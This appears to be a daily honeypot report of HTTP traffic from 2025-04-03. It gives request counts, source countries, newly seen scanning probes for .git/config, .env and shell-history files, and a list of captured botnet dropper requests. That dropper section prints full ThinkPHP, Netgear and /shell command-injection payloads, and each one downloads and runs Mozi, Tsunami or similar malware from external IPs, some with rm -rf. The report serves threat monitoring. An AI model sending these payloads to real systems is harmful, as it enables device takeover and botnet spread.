Table of Contents

Daily Report: 2025-04-03
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 23 stage 1 IP address(es), linked to 7 dropper URL(s).

There are 93 new requests that have never been observed before (these were added to the monitored request database).

A total of 2508 requests were recorded during the day, originating from 23 different countries, with a peak of 849 requests coming from NL.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
FR	Dubai
CN	Georgia
MY
US

botnet_dropper_behaviour
#

remote_addr	request
58.146.59.84	GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1
77.239.214.188	GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
83.63.18.167	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
61.63.126.21	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
51.190.15.243	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
36.41.184.119	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
88.202.136.16	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
106.107.187.124	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
186.29.199.182	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
123.157.136.106	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
31.189.132.161	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
58.242.106.187	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
1.162.204.229	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
222.137.2.57	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://222.137.2.57:34292/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
175.182.207.63	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
58.58.30.134	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
90.214.52.113	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
124.150.45.204	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
220.170.80.79	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
184.68.59.78	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
140.207.30.37	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
88.247.162.58	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘rm -rf bejv86; wget http://176.65.134.201/bejv86 -O /tmp/.Aqua; chmod 777 /tmp/.Aqua; /tmp/.Aqua thinkphp.selfrep’ HTTP/1.1
1.174.21.177	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
7	13	\x04\x01\x01\xBB\x00\x00\x00\x01proxychecker\x00pro.ip-api.com\x00
9	13	CONNECT pro.ip-api.com:443 HTTP/1.1
141	3	GET /_media/.git/config HTTP/1.1
142	3	GET /.vscode/.git/config HTTP/1.1
143	3	GET /.svn/.git/config HTTP/1.1
148	3	GET /.docker/.git/config HTTP/1.1
166	3	GET /_public/.git/config HTTP/1.1
167	3	GET /zend/.git/config HTTP/1.1
168	3	GET /_site/.git/config HTTP/1.1
169	3	GET /wordpress/.git/config HTTP/1.1
170	3	GET /.jenkins/.git/config HTTP/1.1
171	3	GET /_dev/.git/config HTTP/1.1
172	3	GET /.github/.git/config HTTP/1.1
173	3	GET /_backup/.git/config HTTP/1.1
174	3	GET /_docs/.git/config HTTP/1.1
175	3	GET /_static/.git/config HTTP/1.1
176	3	GET /_private/.git/config HTTP/1.1
177	3	GET /workspace/.git/config HTTP/1.1
178	3	GET /_source/.git/config HTTP/1.1
179	3	GET /Module1/js/Module_2o6q5no3oqp65504359524o2150s4333.js HTTP/1.1
180	3	GET /.config/.git/config HTTP/1.1
183	3	GET /_images/.git/config HTTP/1.1
184	3	GET /_admin/.git/config HTTP/1.1
185	3	GET /users/.git/config HTTP/1.1
186	3	GET /.gitlab/.git/config HTTP/1.1
187	3	GET /_core/.git/config HTTP/1.1
188	3	GET /_archive/.git/config HTTP/1.1
189	3	GET /www-data/.git/config HTTP/1.1
190	3	GET /_modules/.git/config HTTP/1.1
192	3	GET /utility/.git/config HTTP/1.1
193	3	GET /.temp/.git/config HTTP/1.1
194	3	GET /_app/.git/config HTTP/1.1
195	3	GET /_js/.git/config HTTP/1.1
196	3	GET /.secret/.git/config HTTP/1.1
197	3	GET /_cache/.git/config HTTP/1.1
198	3	GET /_lib/.git/config HTTP/1.1
199	3	GET /_old/.git/config HTTP/1.1
200	3	GET /_stage/.git/config HTTP/1.1
201	3	GET /_data/.git/config HTTP/1.1
202	3	GET /.deploy/.git/config HTTP/1.1
203	3	GET /.local/.git/config HTTP/1.1
204	3	GET /_test/.git/config HTTP/1.1
205	3	GET /.tmp/.git/config HTTP/1.1
206	3	GET /_api/.git/config HTTP/1.1
208	3	GET /_assets/.git/config HTTP/1.1
315	2	\x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xA8\x84\xF7\x7F\x00\x00`\xF4\x82\x18d\x00\x00\x00\xE0\x81\xCD\x84\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01
414	1	GET /jasperserver-pro/login.html HTTP/1.1
415	1	GET /jasperserver/login.html HTTP/1.1
421	1	GET /v1 HTTP/1.1
426	1	GET /application.ini HTTP/1.1
429	1	GET /administrator/phpinfo.php HTTP/1.1
436	1	GET /Odin/http/call1743701151 HTTP/1.1
437	1	GET /OdinHttpCall1743701151 HTTP/1.1
438	1	GET /odinhttpcall1743701151 HTTP/1.1
453	1	GET /socket.io/1/?t=1743704401772 HTTP/1.1
454	1	GET /socket.io/1/?t=1743704250154 HTTP/1.1
455	1	GET /ban.php HTTP/1.1
469	1	GET /conf/config.ini HTTP/1.1
471	1	GET /debug/default HTTP/1.1
472	1	GET /develop/info.php HTTP/1.1
473	1	GET /database.cfg HTTP/1.1
474	1	GET /config.php.bak HTTP/1.1
476	1	GET /a.php HTTP/1.1
477	1	GET /connectionstrings.xml HTTP/1.1
479	1	GET /connectionstrings.json HTTP/1.1
480	1	GET /configuration.yaml HTTP/1.1
483	1	GET /development.ini HTTP/1.1
485	1	GET /config.ini.bak HTTP/1.1
486	1	GET /configure.php.bak HTTP/1.1
491	1	GET /app.config HTTP/1.1
495	1	GET /odinhttpcall1743642964 HTTP/1.1
496	1	GET /OdinHttpCall1743642964 HTTP/1.1
497	1	GET /Odin/http/call1743642964 HTTP/1.1
529	1	\x00\x0E8N\x1E\xF6\x81\x9C\xDB<\xC4\x00\x00\x00\x00\x00
530	1	\x00\x0E\x08N\x1E\xF6\x81\x9C\xDB<\xC4\x00\x00\x00\x00\x00
565	1	GET /socket.io/1/?t=1743668880196 HTTP/1.1
619	1	GET /.production.env HTTP/1.1
621	1	GET /.env_2 HTTP/1.1
622	1	GET /.env1 HTTP/1.1
623	1	GET /.env.2 HTTP/1.1
624	1	GET /.env.1 HTTP/1.1
636	1	GET /.powenv HTTP/1.1
637	1	GET /.profile HTTP/1.1
639	1	GET /.bashrc HTTP/1.1
645	1	GET /.flaskenv HTTP/1.1
646	1	GET /.editorconfig HTTP/1.1
647	1	GET /.bash_profile HTTP/1.1
649	1	GET /.bash_history HTTP/1.1
650	1	GET /../../web.config HTTP/1.1
651	1	GET /app.yaml HTTP/1.1
652	1	GET /app.json HTTP/1.1
653	1	GET /app.conf HTTP/1.1
655	1	GET /_profiler/info HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	849	NL
1	261	US
2	241	GB
3	233	BG
4	170	MY
5	162	DE
6	70	PL
7	52	KR
8	48	ID
9	45	BN
10	36	HK
11	36	FR
12	33	TW
13	32	BE
14	30	CN
15	30	JP
16	27	SC
17	15	NO
18	14	AZ
19	12	UA
20	11	PT
21	11	CA
22	11	IN
23	9	RU
24	9	NG
25	8	SG
26	8	VN
27	8	CH
28	5	RO
29	5	AU
30	4	GH
31	4	IT
32	3	TR
33	3	AE
34	2	CY
35	2	MC
36	1	MK
37	1	AR
38	1	IR
39	1	EC
40	1	ES
41	1	IQ
42	1	CO
43	1	RS
44	1	LT

Report: 2025-04-02

2 April 2025·576 words

Repport Daily

Report: 2025-04-01

1 April 2025·767 words

Repport Daily

Report: 2025-03-31

31 March 2025·1556 words

Repport Daily

	number_of_occurence	country_iso_code
0	849	NL
1	261	US
2	241	GB
3	233	BG
4	170	MY
5	162	DE
6	70	PL
7	52	KR
8	48	ID
9	45	BN
10	36	HK
11	36	FR
12	33	TW
13	32	BE
14	30	CN
15	30	JP
16	27	SC
17	15	NO
18	14	AZ
19	12	UA
20	11	PT
21	11	CA
22	11	IN
23	9	RU
24	9	NG
25	8	SG
26	8	VN
27	8	CH
28	5	RO
29	5	AU
30	4	GH
31	4	IT
32	3	TR
33	3	AE
34	2	CY
35	2	MC
36	1	MK
37	1	AR
38	1	IR
39	1	EC
40	1	ES
41	1	IQ
42	1	CO
43	1	RS
44	1	LT

	number_of_occurence	country_iso_code
0	849	NL
1	261	US
2	241	GB
3	233	BG
4	170	MY
5	162	DE
6	70	PL
7	52	KR
8	48	ID
9	45	BN
10	36	HK
11	36	FR
12	33	TW
13	32	BE
14	30	CN
15	30	JP
16	27	SC
17	15	NO
18	14	AZ
19	12	UA
20	11	PT
21	11	CA
22	11	IN
23	9	RU
24	9	NG
25	8	SG
26	8	VN
27	8	CH
28	5	RO
29	5	AU
30	4	GH
31	4	IT
32	3	TR
33	3	AE
34	2	CY
35	2	MC
36	1	MK
37	1	AR
38	1	IR
39	1	EC
40	1	ES
41	1	IQ
42	1	CO
43	1	RS
44	1	LT

Daily Report: 2025-04-03#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-04-03
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	849	NL
1	261	US
2	241	GB
3	233	BG
4	170	MY
5	162	DE
6	70	PL
7	52	KR
8	48	ID
9	45	BN
10	36	HK
11	36	FR
12	33	TW
13	32	BE
14	30	CN
15	30	JP
16	27	SC
17	15	NO
18	14	AZ
19	12	UA
20	11	PT
21	11	CA
22	11	IN
23	9	RU
24	9	NG
25	8	SG
26	8	VN
27	8	CH
28	5	RO
29	5	AU
30	4	GH
31	4	IT
32	3	TR
33	3	AE
34	2	CY
35	2	MC
36	1	MK
37	1	AR
38	1	IR
39	1	EC
40	1	ES
41	1	IQ
42	1	CO
43	1	RS
44	1	LT